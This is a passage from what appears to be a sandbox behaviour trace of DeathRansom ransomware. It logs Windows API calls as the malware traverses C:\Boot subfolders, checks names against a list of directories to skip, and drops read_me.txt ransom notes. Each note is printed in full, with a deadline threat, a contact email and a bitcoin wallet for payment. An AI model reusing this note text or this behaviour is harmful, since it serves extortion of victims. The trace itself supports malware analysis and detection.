FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.671] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.672] CloseHandle (hObject=0x7a8) returned 1 [0073.672] GetProcessHeap () returned 0x280000 [0073.672] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40100 | out: hHeap=0x280000) returned 1 [0073.672] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0073.672] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0073.672] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0073.673] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0073.673] StrStrW (lpFirst="sv-se", lpSrch="programdata") returned 0x0 [0073.673] StrStrW (lpFirst="sv-se", lpSrch="$recycle.bin") returned 0x0 [0073.673] StrStrW (lpFirst="sv-se", lpSrch="program files") returned 0x0 [0073.673] StrStrW (lpFirst="sv-se", lpSrch="windows") returned 0x0 [0073.673] StrStrW (lpFirst="sv-se", lpSrch="all users") returned 0x0 [0073.673] StrStrW (lpFirst="sv-se", lpSrch="appdata") returned 0x0 [0073.673] GetProcessHeap () returned 0x280000 [0073.673] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40100 [0073.673] lstrcpyW (in: lpString1=0x8b40100, lpString2="\\\\?\\C:\\Boot\\sv-SE" | out: lpString1="\\\\?\\C:\\Boot\\sv-SE") returned="\\\\?\\C:\\Boot\\sv-SE" [0073.673] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 21 [0073.673] QueueUserWorkItem (Function=0x40a710, Context=0x8b40100, Flags=0x0) returned 1 [0073.673] GetProcessHeap () returned 0x280000 [0073.673] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b50108 [0073.674] wnsprintfW (in: pszDest=0x8b50108, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0073.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.674] wnsprintfW (in: pszDest=0x8b50108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0073.674] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.674] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.674] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.674] wnsprintfW (in: pszDest=0x8b50108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0073.674] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.674] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.674] wnsprintfW (in: pszDest=0x8b50108, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0073.674] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.675] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.675] wnsprintfW (in: pszDest=0x8b50108, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt") returned 29 [0073.675] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt" (normalized: "c:\\boot\\sv-se\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0073.675] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.675] WriteFile (in: hFile=0x7a8, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.676] CloseHandle (hObject=0x7a8) returned 1 [0073.676] GetProcessHeap () returned 0x280000 [0073.676] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b50108 | out: hHeap=0x280000) returned 1 [0073.676] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0073.676] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0073.676] lstrcmpW (lpString1="tr-TR", lpString2="..") returned 1 [0073.676] lstrcmpW (lpString1="tr-TR", lpString2=".") returned 1 [0073.676] StrStrW (lpFirst="tr-tr", lpSrch="programdata") returned 0x0 [0073.676] StrStrW (lpFirst="tr-tr", lpSrch="$recycle.bin") returned 0x0 [0073.676] StrStrW (lpFirst="tr-tr", lpSrch="program files") returned 0x0 [0073.676] StrStrW (lpFirst="tr-tr", lpSrch="windows") returned 0x0 [0073.676] StrStrW (lpFirst="tr-tr", lpSrch="all users") returned 0x0 [0073.676] StrStrW (lpFirst="tr-tr", lpSrch="appdata") returned 0x0 [0073.676] GetProcessHeap () returned 0x280000 [0073.676] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b50108 [0073.677] lstrcpyW (in: lpString1=0x8b50108, lpString2="\\\\?\\C:\\Boot\\tr-TR" | out: lpString1="\\\\?\\C:\\Boot\\tr-TR") returned="\\\\?\\C:\\Boot\\tr-TR" [0073.677] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 22 [0073.677] QueueUserWorkItem (Function=0x40a710, Context=0x8b50108, Flags=0x0) returned 1 [0073.677] GetProcessHeap () returned 0x280000 [0073.677] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60110 [0073.678] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0073.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.762] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0073.762] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.762] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.763] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0073.763] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.763] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.763] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0073.763] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.763] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.763] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt") returned 29 [0073.763] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt" (normalized: "c:\\boot\\tr-tr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.763] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.763] WriteFile (in: hFile=0x7b0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e35c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e35c*=0x6b3, lpOverlapped=0x0) returned 1 [0073.764] CloseHandle (hObject=0x7b0) returned 1 [0073.764] GetProcessHeap () returned 0x280000 [0073.764] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60110 | out: hHeap=0x280000) returned 1 [0073.764] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0073.764] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0073.764] lstrcmpW (lpString1="zh-CN", lpString2="..") returned 1 [0073.764] lstrcmpW (lpString1="zh-CN", lpString2=".") returned 1 [0073.764] StrStrW (lpFirst="zh-cn", lpSrch="programdata") returned 0x0 [0073.765] StrStrW (lpFirst="zh-cn", lpSrch="$recycle.bin") returned 0x0 [0073.765] StrStrW (lpFirst="zh-cn", lpSrch="program files") returned 0x0 [0073.765] StrStrW (lpFirst="zh-cn", lpSrch="windows") returned 0x0 [0073.765] StrStrW (lpFirst="zh-cn", lpSrch="all users") returned 0x0 [0073.765] StrStrW (lpFirst="zh-cn", lpSrch="appdata") returned 0x0 [0073.765] GetProcessHeap () returned 0x280000 [0073.765] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.765] lstrcpyW (in: lpString1=0x89e0050, lpString2="\\\\?\\C:\\Boot\\zh-CN" | out: lpString1="\\\\?\\C:\\Boot\\zh-CN") returned="\\\\?\\C:\\Boot\\zh-CN" [0073.765] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 23 [0073.765] QueueUserWorkItem (Function=0x40a710, Context=0x89e0050, Flags=0x0) returned 1 [0073.765] GetProcessHeap () returned 0x280000 [0073.765] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60110 [0073.765] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0073.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.765] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0073.765] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.765] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.765] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.765] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0073.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.765] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.765] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0073.766] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0073.766] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.766] wnsprintfW (in: pszDest=0x8b60110, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt") returned 29 [0073.766] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt" (normalized: "c:\\boot\\zh-cn\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.766] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.766] 